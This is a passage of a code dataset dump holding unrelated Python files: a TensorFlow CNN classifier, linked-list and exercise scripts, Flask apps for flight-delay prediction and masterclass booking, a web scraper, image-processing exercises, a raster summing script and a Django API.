== tf.estimator.ModeKeys.TRAIN)\n\n # Logits layer\n # Input Tensor Shape: [batch_size, 1024]\n # Output Tensor Shape: [batch_size, 2]\n logits = tf.layers.dense(inputs=dropout, units=2)\n\n # Results:\n # ---------------------------------------------------------------------------------------------------------\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n export_outputs = {'predict_output': tf.estimator.export.PredictOutput(predictions)}\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions, export_outputs=export_outputs)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n print(\"features: \")\n print(type(features))\n print(features)\n print(\"labels: \")\n print(labels.dtype)\n print(labels.get_shape().as_list())\n print(\"logits layer: \")\n print(logits.dtype)\n print(logits.get_shape().as_list())\n print(\"loss layer: \")\n print(loss.dtype)\n print(loss.get_shape().as_list())\n\n # DEBUG\n #exit()\n\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.0001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])}\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\ndef main(unused_argv):\n # Load training and testing data\n train_data = np.zeros(shape=(1000, 150, 150, 3))\n train_labels = np.zeros(shape=(1000))\n test_data = np.zeros(shape=(50, 150, 150, 3))\n test_labels = np.zeros(shape=(50))\n train_directory = \"./temp_data/alex-training-data\"\n train_labels_file = \"./temp_data/train-labels.csv\"\n test_directory = \"./temp_data/alex-testing-data\"\n test_labels_file = \"./temp_data/test-labels.csv\"\n for idx, img in enumerate(os.listdir(train_directory)):\n loaded_img = cv2.imread(train_directory + '/' + img)\n resized_img = cv2.resize(loaded_img, (150, 150))\n resized_img = (resized_img / (np.max(resized_img)/2)) - 1\n train_data[idx] = resized_img\n with open(train_labels_file, newline='') as csvfile:\n csvrdr = csv.reader(csvfile, delimiter=' ')\n for idx, r in enumerate(csvrdr):\n train_labels[idx] = int(r[0])\n\n for idx, img in enumerate(os.listdir(test_directory)):\n loaded_img = cv2.imread(test_directory + '/' + img)\n resized_img = cv2.resize(loaded_img, (150, 150))\n resized_img = (resized_img / (np.max(resized_img)/2)) - 1\n test_data[idx] = resized_img\n with open(test_labels_file, newline='') as csvfile:\n csvrdr = csv.reader(csvfile, delimiter=' ')\n for idx, r in enumerate(csvrdr):\n test_labels[idx] = int(r[0])\n train_data = train_data.astype(np.float32)\n train_labels = train_labels.astype(np.int32)\n test_data = test_data.astype(np.float32)\n test_labels = test_labels.astype(np.int32)\n\n assert not np.any(np.isnan(train_data))\n assert not np.any(np.isnan(train_labels))\n assert not np.any(np.isnan(test_data))\n assert not np.any(np.isnan(test_labels))\n\n #print(train_data.shape)\n #print(train_labels.shape)\n #print(test_data.shape)\n #print(test_labels.shape)\n\n # DEBUG\n #exit()\n\n # Create the Estimator\n tb_classifier = tf.estimator.Estimator(model_fn=cnn_model_fn, model_dir=\"./tb_cnn_model\")\n\n # Set up logging for predictions, specifically \"probabilities\" from \"softmax\" tensor\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n logging_hook = tf.train.LoggingTensorHook(tensors=tensors_to_log, every_n_iter=50)\n\n # Train\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": train_data},\n y=train_labels,\n batch_size=10,\n num_epochs=None,\n shuffle=True)\n# tb_classifier.train(\n# input_fn=train_input_fn,\n# steps=20000,\n# hooks=[logging_hook])\n\n # Test\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": test_data},\n y=test_labels,\n num_epochs=1,\n shuffle=False)\n\n # Results\n eval_results = tb_classifier.evaluate(input_fn=eval_input_fn)\n print(eval_results)\n\n # Export\n full_model_dir = tb_classifier.export_savedmodel(export_dir_base=\"./tb_cnn_model_serve\", serving_input_receiver_fn=serving_input_receiver_fn)\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"CNN/tb_detect_net_barebones.py","file_name":"tb_detect_net_barebones.py","file_ext":"py","file_size_in_byte":8674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"310231901","text":"class Node:\n def __init__(self,data):\n self.data = data\n self.next = None\n self.prev = None\n\nclass doubleLinkedList:\n def __init__(self):\n self.head = None\n\n def append(self, new_data):\n if self.head == None:\n new_data = Node(new_data)\n self.head = new_data\n self.head.prev = None\n else:\n new_data = Node(new_data)\n current = self.head\n while current.next:\n current = current.next\n current.next = new_data\n current.next.prev = current\n new_data.next = None\n\n def delete_node(self, node):\n current = self.head\n while current:\n #if it has only one item\n if current == node and current == self.head:\n if current.next is None:\n current = None\n self.head = None\n return\n\n #delete the head Node\n else:\n nxt = current.next\n nxt.prev = None\n current.next = None\n current = None\n self.head = nxt\n return\n #delete a node which isn't the last one\n elif current == node:\n if current.next is not None:\n prev = current.prev\n nxt = current.next\n prev.next = nxt\n nxt.prev = prev\n current.next = None\n current.prev = None\n current = None\n return\n else:\n prev = current.prev\n prev.next = None\n cur.prev = None\n current = None\n return\n current = current.next\n\n def removeDuplicates(self):\n current = self.head\n seen = {} #hash table\n while current:\n if current.data not in seen:\n seen[current.data] = 1\n current=current.next\n else:\n nxt = current.next #currenti silinecek, current.nexte devam etmesi icin\n self.delete_node(current)\n current = nxt\n #print(seen)\n\n\n def print_list(self):\n current = self.head\n while current:\n print(current.data)\n current = current.next\n\nnewlist = doubleLinkedList()\nnewlist.append(1)\nnewlist.append(4)\nnewlist.append(4)\nnewlist.append(6)\nnewlist.append(7)\nnewlist.append(7)\nnewlist.append(9)\nnewlist.removeDuplicates()\n\nnewlist.print_list()\n\n","sub_path":"linked-lists/double-linkedlist/removeDuplicates.py","file_name":"removeDuplicates.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"328354129","text":"# -*- coding: utf-8 -*-\nimport sys\n\nwhile True:\n\tx = input()\n\t\n\tif x == 0:\n\t\tbreak\n\n\tfor i in range(1, x + 1):\n\t\tif i != x:\n\t\t\tprint(\"%i \" % i),\n\t\t\tsys.stdout.write(\"\")\n\t\telse:\n\t\t\tprint(\"%i\" % i)","sub_path":"Uri-Online-Judge/Wellington/Python/Iniciante/1146.py","file_name":"1146.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"346135640","text":"from flask import Flask, request\nfrom flask import render_template\nimport pandas as pd\nimport numpy as np\nimport json\n#from sklearn.externals import joblib\nimport joblib\nfrom datetime import datetime, timedelta\napp = Flask(__name__)\n\n#main page\n@app.route('/')\ndef home():\n\treturn render_template('home.html')\n\n#capture the input and render the data for next html\n@app.route('/analytics',methods=['POST','GET'])\ndef analytics():\n if request.method=='POST':\n #reading the template to parse through the model\n my_df = pd.read_csv(\"Resources/user_input_df.csv\")\n result=request.form\n print(\"---------------------\")\n print(result)\n print(\"---------------------\")\n \n #get the date entered and converting to date format\n dt = result['dt']\n dt = datetime.strptime(dt, \"%Y-%m-%d\")\n \n #creating -/+3 days from the date entered by the user\n dt_more1 = dt + timedelta(days=1)\n dt_more2 = dt_more1 + timedelta(days=1)\n dt_more3 = dt_more2 + timedelta(days=1)\n\n dt_less1 = dt - timedelta(days=1)\n dt_less2 = dt_less1 - timedelta(days=1)\n dt_less3 = dt_less2 - timedelta(days=1)\n \n day = dt.day\n \n #save month from the date \n month = dt.month\n \n #save day of the week from the date\n day_of_week = dt.weekday()\n \n #get the airline from user input\n airline = result['airline']\n \n #get the origin airport from user input\n origin = result['origin']\n \n #get the destination airport from user input\n destination = result['dest']\n print(\"-----------\")\n print(destination)\n #get the departure hour from user input\n dep_hour = result['dep_hour']\n \n #create df and store the user input to the df\n columns = ['origin','destination','airline','day','month','dep_hour',]\n user_df = pd.DataFrame(columns=columns)\n print(\"before\")\n print(user_df)\n \n user_df = user_df.append({'origin': origin, 'destination': destination, 'airline':airline,\n 'day':str(day),'month':str(month), 'dep_hour':dep_hour}, ignore_index=True )\n \n print(\"after\")\n print(user_df)\n \n user_df.to_json(orient='records', path_or_buf = 'static/data/main_page_input.json')\n \n #create airline df to store airlines and prediction delay value for each airline\n columns = ['airline_code','prob_delay']\n airline_delay_df = pd.DataFrame(columns=columns)\n \n #airline list for prediction\n airline_list = ['AS', 'AA', 'US', 'DL', 'NK', 'UA', 'HA', 'B6', 'OO', 'EV', 'MQ','F9', 'WN', 'VX']\n \n #loop to check delay prediction for each airline\n for i in airline_list:\n #print(i)\n #reading the user input template to parse through the model\n my_df = pd.read_csv(\"Resources/user_input_df.csv\")\n \n #dt = result['dt']\n #dt = datetime.strptime(dt, \"%Y-%m-%d\")\n #month = dt.month\n my_df['MONTH_'+str(month)] = 1\n\n #day_of_week = dt.weekday()\n my_df['DAY_OF_WEEK_'+str(day_of_week)] = 1\n\n #airline = result['airline']\n #updating the model format with each airline\n my_df['AIRLINE_'+str(i)] = 1\n\n #origin = result['origin']\n my_df['ORIGIN_'+str(origin)] = 1\n\n #destination = result['dest']\n my_df['DEST_'+str(destination)] = 1\n\n #dep_hour = result['dep_hour']\n my_df['DEP_HOUR_'+str(dep_hour)] = 1\n\n #print(my_df)\n \n #loading the model\n logmodel = joblib.load('Model/Airline_Delay_Predictition_model.pkl')\n \n #check prediction for the airline for each airline\n my_df['DELAY_YN'] = logmodel.predict_proba(my_df.drop(['DELAY_YN','ARRIVAL_DELAY'],axis=1))[:,1]\n my_df['DELAY_YN'] = my_df['DELAY_YN'].apply(lambda x:(x)*100,2) \n probability_delay = (int(my_df['DELAY_YN'].values[0]*100))/100\n print(\"Probability of flight delay : \" + str(probability_delay) + \"%\")\n \n #append the airline and delay prediction to the df\n airline_delay_df = airline_delay_df.append({'airline_code': i, 'prob_delay': probability_delay}, ignore_index=True )\n \n #save the airline prediction df \n# airline_delay_df.to_json('Resources/airline_delay_prediction.json')\n airline_delay_df.to_json(orient='records',path_or_buf = 'static/data/airline_delay_prediction.json')\n \n print(airline_delay_df)\n\n #confirm the departure delay for 3+ and 3- days from the day entered by the user input\n #creating a df to store the days and prediction delay for each day\n columns = ['dep_days','prob_delay']\n dep_day_delay_df = pd.DataFrame(columns=columns)\n \n #array of total days\n days_input = [dt_less3,dt_less2,dt_less1,dt,dt_more1,dt_more2,dt_more3]\n \n #loop to check the delay prediction for each day\n for i in days_input:\n #print(i)\n \n #reading the template to parse through the model\n my_df = pd.read_csv(\"Resources/user_input_df.csv\")\n\n# dt = result['dt']\n #check the day of the week and month for each date\n dt = i\n\n# dt = datetime.strptime(dt, \"%Y-%m-%d\")\n month = dt.month\n #print(month)\n #update the user input df for the prediction model\n my_df['MONTH_'+str(month)] = 1\n\n day_of_week = dt.weekday()\n #adding 1 to the day of week to match the prediction model format\n day_of_week = day_of_week + 1\n #print(day_of_week)\n \n my_df['DAY_OF_WEEK_'+str(day_of_week)] = 1\n\n #airline = result['airline']\n my_df['AIRLINE_'+str(airline)] = 1\n\n #origin = result['origin']\n my_df['ORIGIN_'+str(origin)] = 1\n\n #destination = result['dest']\n my_df['DEST_'+str(destination)] = 1\n\n #dep_hour = result['dep_hour']\n my_df['DEP_HOUR_'+str(dep_hour)] = 1\n \n #converting the date to day to save for each day prediction\n dep_day = i.day\n #print(my_df)\n \n #loading the model\n logmodel = joblib.load('Model/Airline_Delay_Predictition_model.pkl')\n \n #predicting the delay probability\n my_df['DELAY_YN'] = logmodel.predict_proba(my_df.drop(['DELAY_YN','ARRIVAL_DELAY'],axis=1))[:,1]\n my_df['DELAY_YN'] = my_df['DELAY_YN'].apply(lambda x:(x)*100,2) \n probability_delay = (int(my_df['DELAY_YN'].values[0]*100))/100\n \n #print(\"Probability of flight delay : \" + str(probability_delay) + \"%\")\n #store the value to the df\n dep_day_delay_df = dep_day_delay_df.append({'dep_days': dep_day, 'prob_delay': probability_delay}, ignore_index=True)\n \n #save the per day departure prediction delay \n dep_day_delay_df.to_json(orient='records',path_or_buf = 'static/data/day_delay_prediction.json')\n print(dep_day_delay_df)\n \n #calling the next result html\n# return render_template('score.html',airline=airline, origin=origin, dest=destination, \n# prob=probability_delay,airline_delay_df=airline_delay_df,dep_day_delay_df=dep_day_delay_df) \n\n return render_template('analytics.html') \n \nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"480261737","text":"\"\"\"\n記事タイトルとリンクURLを出力するスクリプト\n\n\"\"\"\nimport requests, bs4\nres = requests.get('https://tonari-it.com')\nres.raise_for_status()\nsoup = bs4.BeautifulSoup(res.text, \"html.parser\")\nelems = soup.select('#list h2 a')\nfor elem in elems:\n print('{} ({})'.format(elem.getText(), elem.get('href')))","sub_path":"practice/practice7.py","file_name":"practice7.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"103488272","text":"# CST205\n# Module 2: Lab 4\n# Craig Calvert\n\ndef getPic():\n return makePicture(pickAFile())\n\n# Problem 1 =====\n\n#Vertical mirror of image\ndef mirrorVrt():\n pic = getPic()\n for x in range(0, getWidth(pic)/2):\n for y in range(0, getHeight(pic)):\n color = getColor(getPixel(pic, x, y))\n setColor(getPixel(pic, getWidth(pic)-x-1, y),color)\n show(pic)\n \n# Horizontal mirror of image (top to bottom)\ndef mirrorHrz1():\n pic = getPic()\n for x in range(0, getWidth(pic)):\n for y in range(0, getHeight(pic)/2):\n color = getColor(getPixel(pic, x, y))\n setColor(getPixel(pic, x, getHeight(pic)-y-1),color)\n show(pic)\n\n# Horizontal mirror of image (bottom to top)\ndef mirrorHrz2():\n pic = getPic()\n for x in range(0, getWidth(pic)):\n for y in range(getHeight(pic)/2, getHeight(pic)):\n color = getColor(getPixel(pic, x, y))\n setColor(getPixel(pic, x, getHeight(pic)-y-1),color)\n show(pic)\n\n# Quadruple mirror of image\ndef mirrorQuad():\n pic = getPic()\n for x in range(0, getWidth(pic)/2):\n for y in range(0, getHeight(pic)/2):\n color = getColor(getPixel(pic, x, y))\n setColor(getPixel(pic, getWidth(pic)-x-1, y),color)\n setColor(getPixel(pic, x, getHeight(pic)-y-1),color)\n setColor(getPixel(pic, getWidth(pic)-x-1, getHeight(pic)-y-1),color)\n show(pic)\n\n# Problem 2 =====\n\ndef simpleCopy(pic):\n newpic = makeEmptyPicture(getWidth(pic), getHeight(pic))\n for x in range(0, getWidth(pic)):\n for y in range(0, getHeight(pic)):\n color = getColor(getPixel(pic, x, y))\n setColor(getPixel(newpic, x, y), color)\n show(newpic)\n\n# Problem 3 =====\n\ndef rotate():\n pic = getPic()\n newpic = makeEmptyPicture(getHeight(pic), getWidth(pic))\n newx = 1\n for x in range(1, getWidth(pic)):\n newy = 1\n for y in range(1, getHeight(pic)):\n color = getColor(getPixel(pic, x, y))\n setColor(getPixel(newpic, newy, getWidth(pic) - newx), color)\n newy = newy + 1\n newx = newx +1\n show(newpic)\n\n# Problem 4 =====\n\ndef shrink():\n pic = getPic()\n newpic = makeEmptyPicture(getWidth(pic)/2, getHeight(pic)/2)\n for x in range(0, getWidth(pic), 2):\n for y in range(0, getHeight(pic), 2):\n color = getColor(getPixel(pic, x, y))\n setColor(getPixel(newpic, x/2, y/2), color)\n show(newpic)\n\n# Method tests =====\n\ndef testProblem2():\n rootPath = r'/Users/craigcalvert/Documents/JES/Lab 4'\n originalPath = os.path.join(rootPath,\"testPic.jpg\")\n originalPic = makePicture(originalPath)\n originalPic = simpleCopy(originalPic)\n return\n","sub_path":"Lab 4/module2_lab4.py","file_name":"module2_lab4.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"490137166","text":"def calculate(make_float, operation, first, second, message = ''):\n if operation == 'add': value = first + second\n if operation == 'subtract': value = first - second\n if operation == 'multiply': value = first * second\n if operation == 'divide': value = first / second\n\n if make_float == True:\n value = float(value)\n else:\n value = int(value)\n\n if message != '':\n msgTxt = message + \" \" + str(value)\n else:\n msgTxt = \"The result is \" + str(value)\n\n return msgTxt\n\nprint(calculate(make_float=False, operation='add', message='You just added', first=2, second=4)) # \"You just added 6\"\nprint(calculate(make_float=True, operation='divide', first=3.5, second=5)) # \"The result is 0.7\"\n","sub_path":"Udemy/Python3Bootcamp/Functions/60_calculate.py","file_name":"60_calculate.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"9887777","text":"from flask import (\n Blueprint,\n flash,\n redirect,\n render_template,\n request,\n Response,\n session,\n url_for,\n)\n\nfrom flask_login import current_user, login_user, login_required, logout_user\n\nfrom app.models import (\n Location,\n Masterclass,\n MasterclassAttendee,\n MasterclassContent,\n User,\n db,\n)\nfrom app import gmaps\n\nmain_bp = Blueprint(\"main_bp\", __name__)\n\n\n@main_bp.route(\"/\")\n@main_bp.route(\"/index\", methods=[\"GET\"])\n@login_required\ndef index():\n masterclasses = (\n Masterclass.query.filter_by(draft=False)\n .order_by(Masterclass.timestamp.asc())\n .all()\n )\n return render_template(\n \"index.html\", title=\"Home\", user=User, masterclasses=masterclasses\n )\n\n\n@main_bp.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for(\"main_bp.index\"))\n if request.method == \"POST\":\n user = User.query.filter_by(email=request.form[\"email-address\"]).first()\n if user is None or not user.check_password(request.form[\"password\"]):\n flash(\"Invalid username or password\")\n return redirect(url_for(\"main_bp.login\"))\n login_user(\n user,\n # remember=request.form.remember_me.data\n )\n return redirect(url_for(\"main_bp.index\"))\n return render_template(\"login.html\", title=\"Sign In\")\n\n\n@main_bp.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for(\"main_bp.index\"))\n\n\n@main_bp.route(\"/masterclass/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef masterclass_profile(masterclass_id):\n masterclass = Masterclass.query.get(masterclass_id)\n already_attendee = MasterclassAttendee.is_attendee(current_user.id, masterclass_id)\n if request.method == \"POST\":\n new_attendee = MasterclassAttendee(\n attendee_id=current_user.id, masterclass_id=masterclass_id\n )\n db.session.add(new_attendee)\n db.session.commit()\n return redirect(\n url_for(\"main_bp.signup_confirmation\", masterclass_id=masterclass_id)\n )\n return render_template(\n \"masterclass-profile.html\",\n masterclass=masterclass,\n already_attendee=already_attendee,\n )\n\n\n@main_bp.route(\"/signup-confirmation\", methods=[\"GET\"])\n@login_required\ndef signup_confirmation():\n masterclass = Masterclass.query.get(request.args[\"masterclass_id\"])\n return render_template(\"signup-confirmation.html\", masterclass=masterclass)\n\n\n@main_bp.route(\"/my-masterclasses\", methods=[\"GET\"])\n@login_required\ndef my_masterclasses():\n user = current_user\n booked_masterclasses = user.get_booked_masterclasses()\n return render_template(\n \"my-masterclasses.html\", booked_masterclasses=booked_masterclasses\n )\n\n\n@main_bp.route(\"/create-masterclass\", methods=[\"GET\", \"POST\"])\n@login_required\ndef create_masterclass_start():\n if request.method == \"POST\":\n new_masterclass = Masterclass()\n db.session.add(new_masterclass)\n db.session.commit()\n session[\"draft_masterclass_id\"] = new_masterclass.id\n return render_template(\"create-masterclass/content/choose-ddat-family.html\")\n return render_template(\"create-masterclass/start.html\")\n\n\n@main_bp.route(\"/create-masterclass/content/job-family\", methods=[\"GET\", \"POST\"])\n@login_required\ndef choose_job_family():\n if request.method == \"GET\":\n return render_template(\"create-masterclass/content/choose-ddat-family.html\")\n elif request.method == \"POST\":\n chosen_job_family = request.form[\"select-job-family\"]\n session[\"job_family\"] = chosen_job_family\n existing_masterclasses = MasterclassContent.query.filter_by(\n category=chosen_job_family\n )\n return render_template(\n \"create-masterclass/content/new-or-existing.html\",\n existing_masterclasses=existing_masterclasses,\n )\n\n\n@main_bp.route(\"/create-masterclass/content/new-or-existing\", methods=[\"GET\", \"POST\"])\n@login_required\ndef choose_new_or_existing_content():\n if request.method == \"POST\":\n choice = request.form[\"which-masterclass\"]\n if choice == \"new masterclass\":\n return render_template(\"create-masterclass/content/create-new.html\")\n else:\n draft_masterclass = Masterclass.query.filter_by(\n id=session[\"draft_masterclass_id\"]\n ).first()\n draft_masterclass.masterclass_content_id = int(choice)\n db.session.add(draft_masterclass)\n db.session.commit()\n return redirect(url_for(\"main_bp.index\"))\n elif request.method == \"GET\":\n chosen_job_family = session[\"job_family\"]\n existing_masterclasses = MasterclassContent.query.filter_by(\n category=chosen_job_family\n )\n return render_template(\n \"create-masterclass/content/new-or-existing.html\",\n existing_masterclasses=existing_masterclasses,\n )\n else:\n return Response(status_code=405)\n\n\n@main_bp.route(\"/create-masterclass/content/create-new\", methods=[\"GET\", \"POST\"])\n@login_required\ndef create_new_content():\n if request.method == \"POST\":\n draft_masterclass = Masterclass.query.get(session[\"draft_masterclass_id\"])\n draft_masterclass.create_new_masterclass_content_and_attach(\n content_name=request.form[\"masterclass-name\"],\n content_description=request.form[\"masterclass-description\"],\n )\n return redirect(\n url_for(\"main_bp.index\")\n ) # TODO will take them back to task list page\n else:\n return render_template(\"create-masterclass/content/create-new.html\")\n\n\n@main_bp.route(\"/create-masterclass/location/type\", methods=[\"GET\", \"POST\"])\n@login_required\ndef choose_location_type():\n if request.method == \"POST\":\n if not request.form.get(\"location-type\"):\n return (\n render_template(\n \"create-masterclass/location/choose-location-type.html\",\n validation_error=True,\n ),\n 403,\n )\n if request.form[\"location-type\"] == \"online\":\n return redirect(url_for(\"main_bp.add_online_details\"))\n elif request.form[\"location-type\"] == \"in person\":\n return redirect(url_for(\"main_bp.search_for_location\"))\n else:\n return render_template(\"create-masterclass/location/choose-location-type.html\")\n\n\n@main_bp.route(\"/create-masterclass/location/online\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_online_details():\n if request.method == \"POST\":\n if not request.form.get(\"url\"):\n return (\n render_template(\n \"create-masterclass/location/online-details.html\",\n validation_error=True,\n joining_instructions=request.form.get(\"joining_instructions\"),\n ),\n 403,\n )\n draft_masterclass = Masterclass.query.get(session[\"draft_masterclass_id\"])\n draft_masterclass.set_location_details(\n data=request.form,\n is_remote=True,\n )\n return redirect(url_for(\"main_bp.index\"))\n\n return render_template(\"create-masterclass/location/online-details.html\")\n\n\n@main_bp.route(\"/create-masterclass/location/search\", methods=[\"GET\", \"POST\"])\n@login_required\ndef search_for_location():\n if request.method == \"POST\":\n if not request.form.get(\"location\"):\n return (\n render_template(\n \"create-masterclass/location/search.html\", validation_error=True\n ),\n 403,\n )\n query = request.form[\"location\"]\n results = Location.return_existing_location_or_none(query)[0:3]\n if results:\n results = [location.to_dict() for location in results]\n is_database_data = True\n else:\n results = gmaps.places(query=query)[\"results\"][0:3]\n is_database_data = False\n\n session[\"location_search_results\"] = results\n session[\"location_in_db\"] = is_database_data\n\n return redirect(url_for(\"main_bp.location_search_results\"))\n\n return render_template(\"create-masterclass/location/search.html\")\n\n\n@main_bp.route(\"/create-masterclass/location/search/results\", methods=[\"GET\", \"POST\"])\n@login_required\ndef location_search_results():\n results = session[\"location_search_results\"]\n is_database_data = session[\"location_in_db\"]\n if request.method == \"POST\":\n if not request.form.get(\"select-location\"):\n return (\n render_template(\n \"create-masterclass/location/search-results.html\",\n validation_error=True,\n results=results,\n is_database_data=is_database_data,\n ),\n 403,\n )\n draft_masterclass = Masterclass.query.get(session[\"draft_masterclass_id\"])\n location = results[int(request.form[\"select-location\"])]\n if is_database_data:\n draft_masterclass.location_id = location[\"id\"]\n else:\n new_location = Location(\n maps_id=location[\"place_id\"],\n name=location[\"name\"],\n address=location[\"formatted_address\"],\n )\n db.session.add(new_location)\n db.session.commit()\n draft_masterclass.location_id = new_location.id\n\n db.session.add(draft_masterclass)\n db.session.commit()\n\n return redirect(url_for(\"main_bp.add_in_person_location_details\"))\n\n return render_template(\n \"create-masterclass/location/search-results.html\",\n results=results,\n is_database_data=is_database_data,\n )\n\n\n@main_bp.route(\"/create-masterclass/location/details\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_in_person_location_details():\n if request.method == \"POST\":\n mandatory_fields = [\"room\", \"floor\"]\n filled_fields = [\n field for field in mandatory_fields if request.form[field] != \"\"\n ]\n if not all(field in filled_fields for field in mandatory_fields):\n return (\n render_template(\n \"create-masterclass/location/in-person-details.html\",\n validation_error=True,\n empty_fields=[\n field\n for field in mandatory_fields\n if field not in filled_fields\n ],\n form_data=request.form,\n ),\n 403,\n )\n draft_masterclass = Masterclass.query.get(session[\"draft_masterclass_id\"])\n draft_masterclass.set_location_details(data=request.form, is_remote=False)\n return redirect(url_for(\"main_bp.index\"))\n return render_template(\"create-masterclass/location/in-person-details.html\")\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":10995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"2949794","text":"from maintain_frontend.services.validation.field_validator import FieldValidator\nfrom maintain_frontend.services.validation.validation_error_builder import ValidationErrorBuilder\n\n\nclass SearchReferenceValidator(object):\n @staticmethod\n def validate(reference, found=True):\n \"\"\"Specifies which validation methods should be called for each input field.\n\n\n parameters:\n - reference: Search reference\n\n returns:\n dict: A validation errors dict with the fieldname as a key and the associated validation errors in a list\n as the value.\n \"\"\"\n\n validation_error_builder = ValidationErrorBuilder()\n\n if found:\n FieldValidator(reference, 'search_reference', 'Reference', validation_error_builder,\n inline_message='Enter a search reference',\n summary_message='Enter a search reference') \\\n .is_required()\n\n FieldValidator(reference, 'search_reference', 'Reference', validation_error_builder,\n inline_message='Search reference must only include numbers 0 to 9',\n summary_message='Search reference must only include numbers 0 to 9') \\\n .is_positive_number_or_zero().is_length_less_than_or_equal_to(9)\n\n FieldValidator(reference, 'search_reference', 'Reference', validation_error_builder) \\\n .is_int()\n else:\n FieldValidator('', 'search_reference', 'Reference', validation_error_builder,\n inline_message='Search reference does not exist',\n summary_message='Search reference does not exist') \\\n .is_required()\n\n validation_errors = validation_error_builder.get()\n\n return validation_errors\n","sub_path":"maintain_frontend/view_official_search/validation/search_reference_validator.py","file_name":"search_reference_validator.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"65781788","text":"import datetime\nimport os\nimport time\nimport rasterio\nimport numpy as np\n#read in file with rasterio\ndef _read_file(file):\n print(\"reading file ...\", file)\n with rasterio.open(file) as src:\n return(src.read(1))\n\ndef monthly_sum(file_list, out_dir, out_product, year):\n# what months to summarize\n start_mon = 1 #start month\n end_mon = 12 #end month\n\n\n #loop through month 1,2,..12 \n for i in range(start_mon,(end_mon+1)): \n print('Month summed up is: ' + str(i))\n Listras = [] \n for et_in in file_list:\n doy = int(et_in.split('.')[0][-3:])\n #doy = int(et_in[-3:])\n #print 'Day of the year: ' + str(doy)\n datea = str(datetime.date(year,1,1) + datetime.timedelta(doy-1))\n mon = int(datea.split('-')[1])\n #print 'Month is: ' + str(mon)\n if mon == i: #if month = i then append grid to list for summing up\n Listras.append(et_in)\n #print('daily grids for month ' + str(i) + ' :')\n #print(Listras)\n if Listras == []:\n print('No daily data for month' + str(i) + ' available..continue to next month')\n continue\n else:\n # Read all data as a list of numpy arrays \n array_list = [_read_file(x) for x in Listras]\n \n array_out = np.sum(array_list, axis=0)\n\n # Get metadata from one of the input files\n with rasterio.open(file_list[0]) as src:\n meta = src.meta\n meta.update(dtype=rasterio.float32)\n\n # Write output file\n #out_name = 'ppt_avg_' + str(year) + (('0'+ str(i))[-2:]) +'.tif'\n out_name = out_product + str(year) + (('0'+ str(i))[-2:]) +'.tif'\n\n with rasterio.open(out_dir + '/' + out_name, 'w', **meta) as dst:\n dst.write(array_out.astype(rasterio.float32), 1)\n\n print('Created monthly grid!', out_name)\n","sub_path":"pixLib/pixLib/sum_mydata.py","file_name":"sum_mydata.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"490674720","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import SubscribeSerializer\n\nfrom .models import Subscribe\n# Create your views here.\n\n@api_view(['GET'])\ndef apiOverview(request):\n\tapi_urls = {\n\t\t'List':'/subscribe-list/',\n\t\t'Create':'/subscribe-create/',\n\t\t}\n\n\treturn Response(api_urls)\n\n@api_view(['GET'])\ndef subscribeList(request):\n\tsubscribes = Subscribe.objects.all().order_by('-id')\n\tserializer = SubscribeSerializer(subscribes, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef subscribeCreate(request):\n\tserializer = SubscribeSerializer(data=request.data)\n\n\tif serializer.is_valid():\n\t\tserializer.save()\n\n\treturn 